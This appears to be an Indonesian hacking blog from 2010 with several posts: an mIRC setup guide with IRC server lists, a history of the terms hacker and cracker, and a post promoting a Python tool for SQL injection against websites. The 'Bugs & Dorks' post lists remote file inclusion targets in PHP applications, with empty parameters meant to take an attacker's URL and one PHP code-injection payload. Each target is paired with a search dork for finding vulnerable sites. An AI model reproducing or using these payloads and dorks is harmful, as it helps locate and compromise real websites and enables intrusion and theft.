Sunday, 24 January 2010

mIRC


mIRC merupakan klien Internet Relay Chat yang digunakan oleh jutaan orang, dan ribuan organisasi untuk berkomunikasi, berbagi, bermain dan bekerja dengan satu sama lain pada jaringan IRC di seluruh dunia. Internet melayani masyarakat selama lebih dari satu dekade, mIRC telah berkembang menjadi kuat, dapat diandalkan dan menyenangkan bagian dari teknologi.

Anda dapat mendownload mIRC di sini.
DOWNLOAD MIRC


Setelah anda Download, silahkan anda bergabung pada server :
- DALNET ( INTERNATIONAL dan pengguna server dalnet banyak diminati oleh chatter Indonesia )
- ALLNET ( NATIONAL dan pengguna server ini juga banyak digunakan oleh Chatter mancanegara )



LIST SERVER DALNET

Beberapa server yang sering dipakai :
irc.dal.net
redemption.ix.us.dal.net
matrix.dal.net
mesra.dal.net
swiftco.wa.us.dal.net
punch.dal.net
tranquility.hub.dal.net
dan lain-lain...

LIST SERVER ALLNET

Beberapa server yang sering dipakai :
irc.plasa.com
boleh.id.allnetwork.org
telkomnet.id.allnetwork.org
hotspeed.sg.allnetwork.org
indonet.id.allnetwork.org
dan lain-lain...

Kedua Server Diatas bisa anda gunakan Port 6667.



 

Saturday, 23 January 2010

Bugs & Dorks


become_editor.php?theme_path= become_editor.php
bad_link.php?theme_path= bad_link.php
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini= webmail/lib/emailreader_execute_on_each_page.inc.php
mantis/login_page.php?g_meta_include_file= mantis/login_page.php
/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “index.php?name=PNphpBB2?
/index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Forgotten your password?”+”No account yet?”
/plugins/safehtml/HTMLSax3.php?dir[plugins]= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+
redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= “/index.php?article_id=8″ “/index.php?article_id=8″
/bookmark4u/lostpasswd.php?env[include_prefix]= “bookmark4u”
?custompluginfile[]= “index.php?categoryid=1″
?view=page&pagename= “Buy, sell, trade, date, events… post anything”
modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= “topgroupname”
/cms/system/openengine.php?oe_classpath= “/cms/website.php?
/popup.php?path= “erstellt mit PHPKIT”
/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “includes/mambo.php” *fr*
/bbs//skin/zero_vote/ask_password.php?dir= “zeroboard”+”zboard”+”board”+”bbs” *.kr
index.php?go= inurl:”index.php?go=”
/stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
protection.php?action=logout&siteurl= PHPFanBase
/kboard.php?

Thursday, 21 January 2010

SQL INJECTION SCHEMAFUZZ

SQL Injection mungkin bukan kata yang aneh lagi bagi para orang yang suka hacking khususnya website, Sebelumnya artikel ini ditujukan untuk anda yang tau tentang perintah SQL walaupun dikit. Oke lanjut kli ini kita akan mencoba teknik SQL Injection menggunakkan python code yaitu schemafuzz.py untuk download silahkan Klik Disini. Ingat karena ini merupakan python code jadi kita perlu menginstall python untuk menjalankannya untuk download program python silahkan langsung ke website python.org atau Klik disini, silahkan sesuaikan dengan sistem Operasi yang anda pakai.


Schemafuzz.py dibuat dengan menggunakan bahasa python oleh ahlul aryana aji dari situs darkc0de
tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

SQL INJECTION

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

MEMEHAMI PENGERTIAN ISTILAH HACKER DAN CRACKER

Dalam dunia keamanan jaringan, kedua istilah di atas bukanlah hal yang asing dan terdengar aneh. Bahkan kedua kelompok inilah yang banyak mempengaruhi kondisi keaman jaringan, sehingga oleh sebagian orang ada yang menyebut mereka sebagai “pengendali” keamanan dunia maya. Namun ternyata tidak banyak dari Kita yang dapat memahami pengertian, karakteristik, dan perbedaan dari kedua istilah di atas.

Sesungguhnya Hacker dan Cracker adalah dua istilah yang memiliki makna sangat berbeda. Namun oleh kebanyakan orang, kedua kelompok yang berperan sangat penting dalam keamanan dunia maya ini sering disalahartikan sehingga mereka seolah-olah sama dan merugikan. Jika kita mencoba menelaah dan mencari letak perbedaan antara Hacker dan Cracker, maka akan terlihat bahwa ternyata mereka memiliki tujuan yang sangat berbeda dalam melakukan aksinya. Oleh karena itu, agar kesalahan pengertian dari kedua istilah tersebut tidak berangsur-angsur, marilah kita mencoba memahami arti dan perbedaan dari kedua istilah tersebut.

SEJARAH HACKER

Terminologi peretas muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.